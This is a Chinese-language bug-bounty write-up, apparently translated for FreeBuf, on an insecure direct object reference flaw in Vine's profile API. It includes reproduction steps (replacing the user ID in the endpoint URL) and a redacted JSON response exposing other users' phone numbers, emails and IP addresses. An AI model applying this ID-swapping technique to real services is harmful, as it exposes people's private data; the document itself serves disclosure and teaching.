挖洞經驗 | Vine使用者隱私資訊洩露漏洞($7560)
大家好,今天我要和大家分享的是,Twitter旗下免費移動應用Vine的使用者隱私洩露漏洞一例,該漏洞由孟加拉國安全研究員 Prial Islam 發現,漏洞原因在於不安全的直接物件引用(IDOR),攻擊者可利用該漏洞獲取任何Vine的IP地址、手機號碼和註冊郵箱等個人敏感資訊。漏洞最終被Twitter官方獎勵了$7560美金。
漏洞說明
存在漏洞的服務端:
ofollow,noindex" target="_blank">https://vine.co/api/users/profiles/ <User Id>
當我在測試Vine網站的子域名時,偶然發現在上述服務端的響應內容中,包含了我賬戶相關的所有個人資訊,我想了想,可能因為我是登入賬戶狀態,這種應該也算正常;
之後,我又檢查了跨域資源共享機制(CORS),看看是否存在錯誤配置情況,但也沒發現任何異常;
接著,我嘗試把User-ID值變化為其它隨機數,這一變,不得了啦,竟然獲得了其他人的所有相關資訊,也就是說,只要把User-ID值變為其它使用者對應的User-ID,那麼,我就可以獲得任何Vine使用者的所有個人註冊資訊了,震驚了我!
漏洞復現
1.前提是,你要先針對某個目標使用者,收集到他的User-ID值,收集方法可能有其翻他的Vine主頁,或是和他發訊息,等等,這裡就不再贅述;
2.把目標使用者User-ID值放到連結https://vine.co/api/users/profiles/ <User Id>中替換掉<User Id>部份,訪問連結,在響應內容中你就會得到目標使用者的所有個人註冊資訊,Response的響應內容如下:
{“code”: “”, “data”: {“followerCount”: 16271364, “includePromoted”: 1, “captchaSucceeded”: 0, “recordComment”: null, “locale”: “iUS”, “shareUrl”: “<a href="https://vine.co/">https://vine.co/</a>████████”, “hiddenPhoneNumber”: 0, “notPorn”: 0, “userId”:█████████, “private”: 0, “likeCount”: null, “commentCount”: null, “platforms”: [“android”, “ios”], “postCount”: null, “profileBackground”: “0x33ccbf”, “suspended”: null, “hiddenFacebook”: 0, “verifiedEmail”: 0, “explicitContent”: 0, “dmcaStrikeCount”:0, “flaggedCount”: 7579, “verified”: 1, “loopCount”: 6132344784, “avatarUrl”: “<a href="http://v.cdn.vine.co/r/avatars/">http://v.cdn.vine.co/r/avatars/</a>████████████████████████████████████████.jpg?versionId=JIjnvXTkbWpjvk7glYZIXDqt187couHr”, “authoredPostCount”:598, “review_result_illegal_review”: 0, “review_result_ok”: 0, “review”: null, “suspendedBy”: null, “twitterId”: ████████, “phoneNumber”: “██████████”, “location”: “Los Angeles California”, “notifyActivity”: 1, “facebookConnected”: 1, “explicitContentAdmin”:0, “statsTags”: null, “hiddenEmail”: 0, “unflaggable”: 0, “username”: “████████”, “modified”: “2017–01–29T01:24:00.000000”, “userIdStr”: “████████”, “twitterIdStr”: “████████”, “vanityUrls”: [“kingbach”], “remixDisabled”: 0, “deleted”: null, “categories”:null, “released”: 0, “loopVelocity”: null, “strikeCounts”: [{“count”: 0, “strikeType”: “SEVERE_POLICY_VIOLATION”}, {“count”: 0, “strikeType”: “DMCA”}, {“count”: 0, “strikeType”: “SENSITIVE”}, {“count”: 0, “strikeType”: “POSSIBLY_ILLEGAL”}, {“count”:0, “strikeType”: “GRAPHIC_NON_VIOLATING”}, {“count”: 0, “strikeType”: “ESC”}], “uploadHD”: 1, “verifiedPhoneNumber”: 1, “hiddenTwitter”: 0, “vineVerified”: 1, “notifyMessages”: 1, “needsPhoneVerification”: 0, “repostCount”: null, “twitterScreenname”:“██████”, “secondaryColor”: “0x33ccbf”, “twitterVerified”: 1, “captchaRequired”: 0, “edition”: null, “acceptsOutOfNetworkConversations”: 1, “disableAddressBook”: 1, “description”: “Instagram/Twitter/Shots/SnapChat- @███ For booking go to the library”,“escStrikeCount”: 0, “review_result_explicit”: 0, “notificationsLastViewed”: “2016–04–26T21:03:35.000000”, “email”: “████████”, “hideFromPopular”: 0, “admin”: 0, “contentReview”: 0, “created”: “2013–04–13T19:30:31.000000”, “review_result_illegal_confirmed”:0, “followingCount”: null, “lastLogin”: “2016–12–13T23:29:40.000000”, “escUser”: 0, “ipAddress”: “██████”, “twitterConnected”: 1}, “success”: true, “error”: “”}
仔細看看上面響應內容中的資訊,你會發現,其中包含了大量個人註冊資訊(都已作了隱藏),如下:
“platforms”: [“android”, “ios”] “flaggedCount”: 7579 “twitterId”: “█████████” “phoneNumber”: “█████” “location”: “Los Angeles California” “modified”: “2017–01–29T01:24:00.000000” “notificationsLastViewed”: “2016–04–26T21:03:35.000000” “email”: “█████████” “created”: “2013–04–13T19:30:31.000000” “lastLogin”: “2016–12–13T23:29:40.000000” “ipAddress”: “█████”
漏洞影響
攻擊者只需利用IP地址、郵箱地址和手機號碼就能大作文章,當然了,也能發起對Vine使用者的大肆個人收集活動,Vine使用者的個人隱私和資訊安全面臨威脅。另外,這還會影響到Vine使用者關聯的Twitter賬戶,因為Vine中允許使用者用Twitter賬戶身份間接登入進入。
更多資訊,請參考原漏洞報告 -https://hackerone.com/reports/202823
*參考來源:medium
,clouds編譯,轉載請註明來自FreeBuf.COM